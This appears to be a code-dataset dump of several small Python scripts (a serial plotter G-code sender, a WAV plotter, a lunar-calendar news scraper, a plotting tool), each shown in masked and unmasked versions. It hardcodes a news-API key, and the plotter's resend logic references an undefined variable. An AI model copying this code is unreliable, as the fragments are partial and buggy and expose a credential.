command = '{}*{}\n'.format(command, self._checksum(command))
self.line_number += 1
self.plotter.write(command.encode('utf-8'))
def _read_line(self):
response = self.plotter.readline()
print('READ: {}'.format(response))
return response.decode('utf-8')
def _checksum(self, command):
checksum = 0
for char in command:
byte_char = char.encode('utf-8')
int_char = int.from_bytes(byte_char, 'big')
checksum = checksum ^ int_char
return checksum
def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):
response = self._read_line()
if not response.strip() and break_on_timeout:
return
previous_line_number = self.line_number - 1
while not response.startswith('ok'):
if response.startswith((f'rs {previous_line_number}',
f'Resend:{previous_line_number}')):
print('resend request: {}'.format(response))
self.line_number = self.line_number - 1
self._send_line(command)
response = self._read_line()
elif response.startswith(('rs', 'Resend')):
raise Exception(
'requested resend of some other line number: {}'.format
(response))
elif response.startswith('!!'):
raise Exception('printer fault')
elif response.startswith('//'):
print('comment: {}'.format(response))
response = self._read_line()
elif response.startswith('wait'):
response = self._read_line()
time.sleep(0.5)
elif response.startswith('start'):
return
else:
print('unknown response: {}'.format(response))
response = self._read_line()
def stop_thread(self):
self._stop.set()
self.parsing_thread = None
| <mask token>
PORT = '/dev/ttys005'
SPEED = 4800.0
class GcodeSender(object):
PEN_LIFT_PULSE = 1500
PEN_DROP_PULSE = 800
def __init__(self, **kwargs):
super(GcodeSender, self).__init__(**kwargs)
self._stop = threading.Event()
self.parsing_thread = None
self.command_queue = Queue()
self.line_number = 1
self.plotter = None
dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=
dispatcher.Any)
dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',
sender=dispatcher.Any)
dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=
dispatcher.Any)
def on_move_to_point(self, x, y):
print('X{0:.3f} Y{1:.3f}'.format(x, y))
command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)
self.command_queue.put_nowait(command)
def on_pen_drop(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)
)
self.command_queue.put_nowait('G4 S1')
def on_pen_lift(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)
)
self.command_queue.put_nowait('G4 P500')
def start(self):
self._stop.clear()
self.parsing_thread = threading.Thread(target=self.start_processing)
self.parsing_thread.daemon = True
self.parsing_thread.start()
def stop(self):
if self.plotter:
self.plotter.close()
self.plotter = None
def __del__(self):
self.stop_thread()
self.stop()
def start_processing(self):
self.command_queue.put_nowait('M110 N2')
self.command_queue.put_nowait('G90')
self.command_queue.put_nowait('G28')
self.plotter = serial.Serial(PORT, 115200, timeout=1)
self._read_and_process_and_wait_for_ok(break_on_timeout=True)
while True:
while not self.command_queue.empty():
command = self.command_queue.get_nowait()
self.command_queue.task_done()
self._send_line(command)
self._read_and_process_and_wait_for_ok()
time.sleep(0.5)
def _send_line(self, line):
command = 'N{} {} '.format(self.line_number, line)
command = '{}*{}\n'.format(command, self._checksum(command))
self.line_number += 1
self.plotter.write(command.encode('utf-8'))
def _read_line(self):
response = self.plotter.readline()
print('READ: {}'.format(response))
return response.decode('utf-8')
def _checksum(self, command):
checksum = 0
for char in command:
byte_char = char.encode('utf-8')
int_char = int.from_bytes(byte_char, 'big')
checksum = checksum ^ int_char
return checksum
def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):
response = self._read_line()
if not response.strip() and break_on_timeout:
return
previous_line_number = self.line_number - 1
while not response.startswith('ok'):
if response.startswith((f'rs {previous_line_number}',
f'Resend:{previous_line_number}')):
print('resend request: {}'.format(response))
self.line_number = self.line_number - 1
self._send_line(command)
response = self._read_line()
elif response.startswith(('rs', 'Resend')):
raise Exception(
'requested resend of some other line number: {}'.format
(response))
elif response.startswith('!!'):
raise Exception('printer fault')
elif response.startswith('//'):
print('comment: {}'.format(response))
response = self._read_line()
elif response.startswith('wait'):
response = self._read_line()
time.sleep(0.5)
elif response.startswith('start'):
return
else:
print('unknown response: {}'.format(response))
response = self._read_line()
def stop_thread(self):
self._stop.set()
self.parsing_thread = None
| from pydispatch import dispatcher
import time
import serial
import threading
from queue import Queue
PORT='/dev/ttys005'
#PORT='/dev/tty.usbmodem1461'
SPEED=4800.0
class GcodeSender(object):
PEN_LIFT_PULSE = 1500
PEN_DROP_PULSE = 800
def __init__(self, **kwargs):
super(GcodeSender, self).__init__(**kwargs)
self._stop = threading.Event()
self.parsing_thread = None
self.command_queue = Queue()
self.line_number = 1
self.plotter = None
dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=dispatcher.Any)
dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT', sender=dispatcher.Any)
dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=dispatcher.Any)
def on_move_to_point(self, x, y):
print('X{0:.3f} Y{1:.3f}'.format(x,y))
command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x,y,SPEED)
self.command_queue.put_nowait(command)
def on_pen_drop(self):
#print("pen drop")
self.command_queue.put_nowait("M400")
self.command_queue.put_nowait("M340 P0 S{}".format(self.PEN_DROP_PULSE))
self.command_queue.put_nowait("G4 S1")
def on_pen_lift(self):
#print("pen lift")
self.command_queue.put_nowait("M400")
self.command_queue.put_nowait("M340 P0 S{}".format(self.PEN_LIFT_PULSE))
self.command_queue.put_nowait("G4 P500")
def start(self):
self._stop.clear()
self.parsing_thread = threading.Thread(target=self.start_processing)
self.parsing_thread.daemon = True
self.parsing_thread.start()
def stop(self):
if(self.plotter):
self.plotter.close()
self.plotter = None
def __del__(self):
self.stop_thread()
self.stop()
def start_processing(self):
self.command_queue.put_nowait('M110 N2')
self.command_queue.put_nowait('G90')
self.command_queue.put_nowait('G28')
self.plotter = serial.Serial(PORT, 115200, timeout=1)
self._read_and_process_and_wait_for_ok(break_on_timeout=True)
while True:
while not self.command_queue.empty():
command = self.command_queue.get_nowait()
self.command_queue.task_done()
self._send_line(command)
self._read_and_process_and_wait_for_ok()
time.sleep(0.5)
def _send_line(self, line):
command = 'N{} {} '.format(self.line_number, line)
command = '{}*{}\n'.format(command, self._checksum(command))
#print("SEND: {}".format(command))
self.line_number += 1
self.plotter.write(command.encode('utf-8'))
def _read_line(self):
response = self.plotter.readline()
print("READ: {}".format(response))
return response.decode('utf-8')
def _checksum(self, command):
checksum = 0
for char in command:
byte_char = char.encode('utf-8')
int_char = int.from_bytes(byte_char, 'big')
checksum = checksum ^ int_char
return checksum
def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):
response = self._read_line()
if not response.strip() and break_on_timeout:
return
previous_line_number = self.line_number-1
while not response.startswith('ok'):
if response.startswith((f"rs {previous_line_number}", f"Resend:{previous_line_number}")):
print('resend request: {}'.format(response))
self.line_number = self.line_number-1
self._send_line(command)
response = self._read_line()
elif response.startswith(('rs', 'Resend')):
raise Exception('requested resend of some other line number: {}'.format(response))
elif response.startswith('!!'):
raise Exception('printer fault')
elif response.startswith('//'):
print('comment: {}'.format(response))
response = self._read_line()
elif response.startswith('wait'):
response = self._read_line()
time.sleep(0.5)
elif response.startswith('start'):
return
else:
print('unknown response: {}'.format(response))
response = self._read_line()
#raise Exception('unknown response: {}'.format(response))
def stop_thread(self):
self._stop.set()
self.parsing_thread = None
| [
8,
13,
14,
16,
18
] |
49 | c105f06e302740e9b7be100df905852bb5610a2c | import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import numpy as np
import struct
import wave
scale = 0.01
wav = wave.open('output.wav', 'r')
print 'channels %d'%wav.getnchannels()
print 'smpl width %d'%wav.getsampwidth()
print 'frame rate %f'%wav.getframerate()
nframes = wav.getnframes()
print 'frames %d'%nframes
data = wav.readframes(nframes)
data = scale * np.array(struct.unpack('<%dh'%nframes, data)) / float((1 << 14))
plt.plot(data)
plt.show()
| null | null | null | null | [
0
] |
50 | e1d0648825695584d3ea518db961a9178ea0c66a | <mask token>
def china_lunar():
today = str(date.today())
today_list = today.split('-')
lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(
datetime.datetime.now().month), int(datetime.datetime.now().day))
if lunar_day.Lleap:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
else:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
return today, china_day
<mask token>
def news_put():
news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1
] + '\n' + morning_news()
return news_spider_message
<mask token>
def NewYork_news(page=1):
society = 'https://cn.nytimes.com/society/{}/'.format(page)
response = requests.get(url=society, headers=headers)
mytree = lxml.etree.HTML(response.text)
title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
url = mytree.xpath(
'//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
newss_1 = ''
number = 1
for t in title:
newss = str(number) + ':' + str_list(t.text
) + '。' + '\n' + ' 概要:' + str_list(news[title.index(t)].text
) + '。' + '\n' + ' 详情:' + '\n' + '\n'
newss_1 += newss
number += 1
return newss_1
def NewYork_news_put(page=0):
news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[
1] + '\n' + NewYork_news(page)
return news_spider_message
def str_list(t):
m = ''
for i in list(t):
if i == '中':
china = 'Z'
m += china + '_'
else:
m += i + '_'
return m
| <mask token>
def china_lunar():
today = str(date.today())
today_list = today.split('-')
lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(
datetime.datetime.now().month), int(datetime.datetime.now().day))
if lunar_day.Lleap:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
else:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
return today, china_day
<mask token>
def morning_news():
news_api = (
'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'
)
response = requests.get(news_api)
print(dict(response.json()))
news_list = dict(response.json())
news = ''
m = 1
news_q = ''
for i in news_list['newslist']:
img_url = ''
if i['url'] == '':
img_url = i['imgsrc']
news = str(str(m) + ':' + i['title'] + '\n' + i['url'] + img_url + '\n'
)
news_q += str(news)
m += 1
return news_q
def news_put():
news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1
] + '\n' + morning_news()
return news_spider_message
<mask token>
def NewYork_news(page=1):
society = 'https://cn.nytimes.com/society/{}/'.format(page)
response = requests.get(url=society, headers=headers)
mytree = lxml.etree.HTML(response.text)
title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
url = mytree.xpath(
'//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
newss_1 = ''
number = 1
for t in title:
newss = str(number) + ':' + str_list(t.text
) + '。' + '\n' + ' 概要:' + str_list(news[title.index(t)].text
) + '。' + '\n' + ' 详情:' + '\n' + '\n'
newss_1 += newss
number += 1
return newss_1
def NewYork_news_put(page=0):
news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[
1] + '\n' + NewYork_news(page)
return news_spider_message
def str_list(t):
m = ''
for i in list(t):
if i == '中':
china = 'Z'
m += china + '_'
else:
m += i + '_'
return m
| <mask token>
ymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'
]
rmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',
u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',
u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'
]
lunar = sxtwl.Lunar()
def china_lunar():
today = str(date.today())
today_list = today.split('-')
lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(
datetime.datetime.now().month), int(datetime.datetime.now().day))
if lunar_day.Lleap:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
else:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
return today, china_day
<mask token>
def morning_news():
news_api = (
'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'
)
response = requests.get(news_api)
print(dict(response.json()))
news_list = dict(response.json())
news = ''
m = 1
news_q = ''
for i in news_list['newslist']:
img_url = ''
if i['url'] == '':
img_url = i['imgsrc']
news = str(str(m) + ':' + i['title'] + '\n' + i['url'] + img_url + '\n'
)
news_q += str(news)
m += 1
return news_q
def news_put():
news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1
] + '\n' + morning_news()
return news_spider_message
headers = {'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'
}
def NewYork_news(page=1):
society = 'https://cn.nytimes.com/society/{}/'.format(page)
response = requests.get(url=society, headers=headers)
mytree = lxml.etree.HTML(response.text)
title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
url = mytree.xpath(
'//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
newss_1 = ''
number = 1
for t in title:
newss = str(number) + ':' + str_list(t.text
) + '。' + '\n' + ' 概要:' + str_list(news[title.index(t)].text
) + '。' + '\n' + ' 详情:' + '\n' + '\n'
newss_1 += newss
number += 1
return newss_1
def NewYork_news_put(page=0):
news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[
1] + '\n' + NewYork_news(page)
return news_spider_message
def str_list(t):
m = ''
for i in list(t):
if i == '中':
china = 'Z'
m += china + '_'
else:
m += i + '_'
return m
| import requests
import sxtwl
import datetime
from datetime import date
import lxml
from lxml import etree
ymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'
]
rmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',
u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',
u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'
]
lunar = sxtwl.Lunar()
def china_lunar():
today = str(date.today())
today_list = today.split('-')
lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(
datetime.datetime.now().month), int(datetime.datetime.now().day))
if lunar_day.Lleap:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
else:
china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
return today, china_day
import json
def morning_news():
news_api = (
'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'
)
response = requests.get(news_api)
print(dict(response.json()))
news_list = dict(response.json())
news = ''
m = 1
news_q = ''
for i in news_list['newslist']:
img_url = ''
if i['url'] == '':
img_url = i['imgsrc']
news = str(str(m) + ':' + i['title'] + '\n' + i['url'] + img_url + '\n'
)
news_q += str(news)
m += 1
return news_q
def news_put():
news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1
] + '\n' + morning_news()
return news_spider_message
headers = {'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'
}
def NewYork_news(page=1):
society = 'https://cn.nytimes.com/society/{}/'.format(page)
response = requests.get(url=society, headers=headers)
mytree = lxml.etree.HTML(response.text)
title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
url = mytree.xpath(
'//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
newss_1 = ''
number = 1
for t in title:
newss = str(number) + ':' + str_list(t.text
) + '。' + '\n' + ' 概要:' + str_list(news[title.index(t)].text
) + '。' + '\n' + ' 详情:' + '\n' + '\n'
newss_1 += newss
number += 1
return newss_1
def NewYork_news_put(page=0):
news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[
1] + '\n' + NewYork_news(page)
return news_spider_message
def str_list(t):
m = ''
for i in list(t):
if i == '中':
china = 'Z'
m += china + '_'
else:
m += i + '_'
return m
| import requests
import sxtwl
import datetime
from datetime import date
import lxml
from lxml import etree
# 日历中文索引
ymc = [u"十一", u"十二", u"正", u"二", u"三", u"四", u"五", u"六", u"七", u"八", u"九", u"十"]
rmc = [u"初一", u"初二", u"初三", u"初四", u"初五", u"初六", u"初七", u"初八", u"初九", u"初十", \
u"十一", u"十二", u"十三", u"十四", u"十五", u"十六", u"十七", u"十八", u"十九", \
u"二十", u"廿一", u"廿二", u"廿三", u"廿四", u"廿五", u"廿六", u"廿七", u"廿八", u"廿九", u"三十", u"卅一"]
# 日历库实例化
lunar = sxtwl.Lunar()
# 2.阳历转阴历
def china_lunar():
today = str(date.today())
today_list = today.split('-') # ['2019', '08', '08']
lunar_day = lunar.getDayBySolar((int)(datetime.datetime.now().year), (int)(datetime.datetime.now().month), (int)(datetime.datetime.now().day)) # 输入年月日
# 判断是否为润年
if (lunar_day.Lleap):
china_day = "农历:{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
else:
china_day ="农历:{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
return today,china_day
import json
def morning_news():
news_api = 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'
response = requests.get(news_api)
print(dict(response.json()))
news_list = dict(response.json())
news = ''
m = 1
news_q=''
for i in news_list['newslist']:
img_url=''
if i['url'] == '':
img_url = i['imgsrc']
news = str(str(m)+":"+i['title']+"\n"+i['url']+img_url+"\n")
news_q += str(news)
m += 1
return news_q
def news_put():
news_spider_message = '【早间新闻】 '+china_lunar()[0]+" "+china_lunar()[1]+"\n"+morning_news()
return news_spider_message
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'}
def NewYork_news(page=1):
society = 'https://cn.nytimes.com/society/{}/'.format(page)
response = requests.get(url=society,headers =headers )
mytree = lxml.etree.HTML(response.text)
title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
url = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
# print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//h3/a')[1].text) #这个是标题
# print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//p')[1].text) # 这个是简介
#
# print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//h3/a/@href')[1]) # 这个是链接
newss_1 = ''
number = 1
for t in title:
newss = str(number)+":"+str_list(t.text) +'。'+'\n'+' 概要:'+str_list(news[title.index(t)].text)+'。'+'\n'+' 详情:'+'\n'+'\n'
newss_1 +=newss
number += 1
return newss_1
def NewYork_news_put(page=0):
news_spider_message = '【纽约时报中文网】'+china_lunar()[0]+" "+china_lunar()[1]+"\n"+NewYork_news(page)
return news_spider_message
def str_list(t):
m=''
for i in list(t):
if i == '中':
china = 'Z'
m += china +'_'
else:
m += i + '_'
return m
| [
5,
6,
7,
8,
9
] |
51 | 2c39660da8fe839c4634cd73ce069acc7b1b29b4 | <mask token>
| <mask token>
@measure_time_of_func
def fib(n):
sequence = [1, 1]
for i in range(2, n, 1):
sequence.append(sequence[i - 1] + sequence[i - 2])
return sequence
| <mask token>
def measure_time_of_func(func):
def wrapper_func(n):
start_time = time.time()
fib_seq = func(n)
end_time = time.time()
return fib_seq, end_time - start_time
return wrapper_func
@measure_time_of_func
def fib(n):
sequence = [1, 1]
for i in range(2, n, 1):
sequence.append(sequence[i - 1] + sequence[i - 2])
return sequence
| import time
def measure_time_of_func(func):
def wrapper_func(n):
start_time = time.time()
fib_seq = func(n)
end_time = time.time()
return fib_seq, end_time - start_time
return wrapper_func
@measure_time_of_func
def fib(n):
sequence = [1, 1]
for i in range(2, n, 1):
sequence.append(sequence[i - 1] + sequence[i - 2])
return sequence
| import time
# Decorator
def measure_time_of_func(func):
def wrapper_func(n):
start_time = time.time()
fib_seq = func(n)
end_time = time.time()
return (fib_seq, end_time - start_time)
return wrapper_func
# Returns a list with first n numbers of fibonacci sequence.
@measure_time_of_func
def fib(n):
sequence = [1, 1]
for i in range(2, n, 1):
sequence.append(sequence[i - 1] + sequence[i - 2])
return sequence
| [
0,
1,
2,
3,
4
] |
52 | c87e6f8780bf8d9097f200c7f2f0faf55beb480c | <mask token>
def transform_data2(fn, *args):
for arg in args:
print(fn(arg))
<mask token>
| def transform_data(fn):
print(fn(10))
<mask token>
def transform_data2(fn, *args):
for arg in args:
print(fn(arg))
<mask token>
| def transform_data(fn):
print(fn(10))
<mask token>
def transform_data2(fn, *args):
for arg in args:
print(fn(arg))
<mask token>
def transform_data2(fn, *args):
for arg in args:
print('Result: {:^20.2f}'.format(fn(arg)))
<mask token>
| def transform_data(fn):
print(fn(10))
transform_data(lambda data: data / 5)
def transform_data2(fn, *args):
for arg in args:
print(fn(arg))
transform_data2(lambda data: data / 5, 10, 15, 22, 30)
def transform_data2(fn, *args):
for arg in args:
print('Result: {:^20.2f}'.format(fn(arg)))
transform_data2(lambda data: data / 5, 10, 15, 22, 30)
| # 1
def transform_data(fn):
print(fn(10))
# 2
transform_data(lambda data: data / 5)
# 3
def transform_data2(fn, *args):
for arg in args:
print(fn(arg))
transform_data2(lambda data: data / 5, 10, 15, 22, 30)
# 4
def transform_data2(fn, *args):
for arg in args:
print('Result: {:^20.2f}'.format(fn(arg)))
transform_data2(lambda data: data / 5, 10, 15, 22, 30) | [
1,
2,
3,
4,
5
] |
53 | f4f08015b7638f4d6ea793350d5d19a3485978cd | <mask token>
def get_objectives(data):
"""Get a list of all first chromosomes' objective values."""
objectives = [math.log(population[0]['objective']) for population in data]
return objectives
def get_new_values(values):
"""Record any changes higher. Its size is the same as its argument's."""
new_values = []
new_value = values[0]
for value in values:
if value > new_value:
new_value = value
new_values.append(new_value)
return new_values
def main(values, is_animation=False):
"""Main function to show the plot which could be played with animation."""
def on_clicked(event):
"""Direct the program when a key is pressed."""
if event.key == 'x':
os._exit(0)
if event.key == 's':
now = datetime.now()
current_time = now.strftime('%H-%M-%S')
plot_name = 'Plot' + '-' + current_time
pyplot.title('', loc='left', pad=20)
fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],
plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)
exit(0)
def draw(values):
"""Plot the grid, the line graphs and the titles."""
subplot.yaxis.grid(True, linestyle='dashed')
new_values = get_new_values(values)
subplot.plot(range(len(values)), values)
subplot.plot(range(len(new_values)), new_values, linewidth=2)
pyplot.title('Press X to exit\nPress S to save', loc='left',
fontsize=14, color='#1F76B4', style='italic', pad=20)
pyplot.title(
f"""{'Max objective:':>25}{max(values):>10.2E}
{'Generation:':>25}{values.index(max(values)):>10}"""
, loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,
color='#FF7E0E', pad=20)
maplot.rcParams['toolbar'] = 'None'
maplot.rcParams['font.family'] = 'Candara'
maplot.rcParams['font.size'] = 12
maplot.rcParams['font.weight'] = 500
fig = pyplot.figure(figsize=(10, 5))
fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')
manager = pyplot.get_current_fig_manager()
manager.window.wm_iconbitmap(CONS['ICON_FILE'])
subplot = fig.add_subplot(111, frameon=True)
subplot.spines['right'].set_visible(False)
subplot.spines['left'].set_visible(False)
subplot.spines['top'].set_visible(False)
subplot.yaxis.tick_right()
subplot.tick_params(axis='y', which='major', pad=5)
subplot.tick_params(axis='x', which='major', pad=5)
pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)
pyplot.connect('key_press_event', on_clicked)
if is_animation:
for index in range(1, len(values) + 1):
subplot.clear()
draw(values[:index])
pyplot.pause(0.0001)
else:
draw(values)
pyplot.show()
<mask token>
| <mask token>
def get_data():
"""Read output file to get data."""
try:
with open(CONS['OUTPUT_FILE'], 'r') as file:
data = json.load(file)[1]
return data
except FileNotFoundError:
print('Data file not found.')
exit()
def get_objectives(data):
"""Get a list of all first chromosomes' objective values."""
objectives = [math.log(population[0]['objective']) for population in data]
return objectives
def get_new_values(values):
"""Record any changes higher. Its size is the same as its argument's."""
new_values = []
new_value = values[0]
for value in values:
if value > new_value:
new_value = value
new_values.append(new_value)
return new_values
def main(values, is_animation=False):
"""Main function to show the plot which could be played with animation."""
def on_clicked(event):
"""Direct the program when a key is pressed."""
if event.key == 'x':
os._exit(0)
if event.key == 's':
now = datetime.now()
current_time = now.strftime('%H-%M-%S')
plot_name = 'Plot' + '-' + current_time
pyplot.title('', loc='left', pad=20)
fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],
plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)
exit(0)
def draw(values):
"""Plot the grid, the line graphs and the titles."""
subplot.yaxis.grid(True, linestyle='dashed')
new_values = get_new_values(values)
subplot.plot(range(len(values)), values)
subplot.plot(range(len(new_values)), new_values, linewidth=2)
pyplot.title('Press X to exit\nPress S to save', loc='left',
fontsize=14, color='#1F76B4', style='italic', pad=20)
pyplot.title(
f"""{'Max objective:':>25}{max(values):>10.2E}
{'Generation:':>25}{values.index(max(values)):>10}"""
, loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,
color='#FF7E0E', pad=20)
maplot.rcParams['toolbar'] = 'None'
maplot.rcParams['font.family'] = 'Candara'
maplot.rcParams['font.size'] = 12
maplot.rcParams['font.weight'] = 500
fig = pyplot.figure(figsize=(10, 5))
fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')
manager = pyplot.get_current_fig_manager()
manager.window.wm_iconbitmap(CONS['ICON_FILE'])
subplot = fig.add_subplot(111, frameon=True)
subplot.spines['right'].set_visible(False)
subplot.spines['left'].set_visible(False)
subplot.spines['top'].set_visible(False)
subplot.yaxis.tick_right()
subplot.tick_params(axis='y', which='major', pad=5)
subplot.tick_params(axis='x', which='major', pad=5)
pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)
pyplot.connect('key_press_event', on_clicked)
if is_animation:
for index in range(1, len(values) + 1):
subplot.clear()
draw(values[:index])
pyplot.pause(0.0001)
else:
draw(values)
pyplot.show()
<mask token>
| <mask token>
def get_data():
"""Read output file to get data."""
try:
with open(CONS['OUTPUT_FILE'], 'r') as file:
data = json.load(file)[1]
return data
except FileNotFoundError:
print('Data file not found.')
exit()
def get_objectives(data):
"""Get a list of all first chromosomes' objective values."""
objectives = [math.log(population[0]['objective']) for population in data]
return objectives
def get_new_values(values):
"""Record any changes higher. Its size is the same as its argument's."""
new_values = []
new_value = values[0]
for value in values:
if value > new_value:
new_value = value
new_values.append(new_value)
return new_values
def main(values, is_animation=False):
"""Main function to show the plot which could be played with animation."""
def on_clicked(event):
"""Direct the program when a key is pressed."""
if event.key == 'x':
os._exit(0)
if event.key == 's':
now = datetime.now()
current_time = now.strftime('%H-%M-%S')
plot_name = 'Plot' + '-' + current_time
pyplot.title('', loc='left', pad=20)
fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],
plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)
exit(0)
def draw(values):
"""Plot the grid, the line graphs and the titles."""
subplot.yaxis.grid(True, linestyle='dashed')
new_values = get_new_values(values)
subplot.plot(range(len(values)), values)
subplot.plot(range(len(new_values)), new_values, linewidth=2)
pyplot.title('Press X to exit\nPress S to save', loc='left',
fontsize=14, color='#1F76B4', style='italic', pad=20)
pyplot.title(
f"""{'Max objective:':>25}{max(values):>10.2E}
{'Generation:':>25}{values.index(max(values)):>10}"""
, loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,
color='#FF7E0E', pad=20)
maplot.rcParams['toolbar'] = 'None'
maplot.rcParams['font.family'] = 'Candara'
maplot.rcParams['font.size'] = 12
maplot.rcParams['font.weight'] = 500
fig = pyplot.figure(figsize=(10, 5))
fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')
manager = pyplot.get_current_fig_manager()
manager.window.wm_iconbitmap(CONS['ICON_FILE'])
subplot = fig.add_subplot(111, frameon=True)
subplot.spines['right'].set_visible(False)
subplot.spines['left'].set_visible(False)
subplot.spines['top'].set_visible(False)
subplot.yaxis.tick_right()
subplot.tick_params(axis='y', which='major', pad=5)
subplot.tick_params(axis='x', which='major', pad=5)
pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)
pyplot.connect('key_press_event', on_clicked)
if is_animation:
for index in range(1, len(values) + 1):
subplot.clear()
draw(values[:index])
pyplot.pause(0.0001)
else:
draw(values)
pyplot.show()
if __name__ == '__main__':
__package__ = 'inputprocess'
objectives = get_objectives(get_data())
main(objectives, is_animation=CONS['IS_ANIMATION'])
| <mask token>
import os
import json
import math
import matplotlib as maplot
